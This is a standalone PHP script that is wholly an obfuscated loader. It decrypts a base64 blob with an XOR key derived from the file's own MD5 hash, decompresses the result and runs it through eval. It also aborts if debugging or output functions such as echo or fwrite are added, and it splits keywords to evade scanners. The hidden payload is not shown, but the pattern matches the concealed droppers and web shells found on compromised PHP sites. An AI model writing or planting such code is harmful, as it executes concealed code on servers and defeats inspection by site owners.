<?php
$qqueqpy="649cdab9141bc7aee21a81a9c8ba51cb";
$sjkotik="550d585a065452090105040006070253010655540104585f550e530707520707";
$nywlalvle="G+Nc9yM/swAgNOUfRUf7c0USCfiHaIDOFuIqYnDrN2gLrSViGM52W4up+J2a8SsXTDVlsIzW2wGeuwZLNFsnDKE5lOGC42fuxnq2c4M+3GN1l++GcBMK5UiSuSWGYrXKI2sjsPYKh4FFMtOt+z485ty0EtvmoYEbryReYP7F5MhtAZT/APOU+mRCYT4gQarzJYZ3hU1vrrPLkASBomD3nkDAtXSOf/k39jxxeQ==";
$duryxkh=file_get_contents(__FILE__);
$hkdvfwh=str_replace($nywlalvle,"",$duryxkh);
if(strpos($hkdvfwh,"ec"."ho")!==false||strpos($hkdvfwh,"pr"."int")!==false||strpos($hkdvfwh,"var_"."dump")!==false||strpos($hkdvfwh,"file_put_"."contents")!==false||strpos($hkdvfwh,"fw"."rite")!==false){die();}
$rhzjwxns=str_replace(array($qqueqpy,$sjkotik),array("SP_74a4196d","KP_bd6e6c23"),$duryxkh);
$jfhieix=md5($rhzjwxns);
$bewtty=hex2bin($sjkotik);
$wohquvrz="";
$ovnhgsrq=strlen($jfhieix);
for($uqcitgz=0;$uqcitgz<$ovnhgsrq;$uqcitgz++){
$wohquvrz.=chr(ord($bewtty[$uqcitgz])^ord($jfhieix[$uqcitgz]));
}
$wgqxtkac=base64_decode($nywlalvle);
$xquzdvbm=strlen($wgqxtkac);
$mbbrrckiu="";
$zxuttebk=strlen($wohquvrz);
for($uqcitgz=0;$uqcitgz<$xquzdvbm;$uqcitgz++){
$mbbrrckiu.=$wgqxtkac[$uqcitgz]^$wohquvrz[$uqcitgz%$zxuttebk];
}
$dgvzdvas="gzun"."compress";
eval($dgvzdvas($mbbrrckiu));
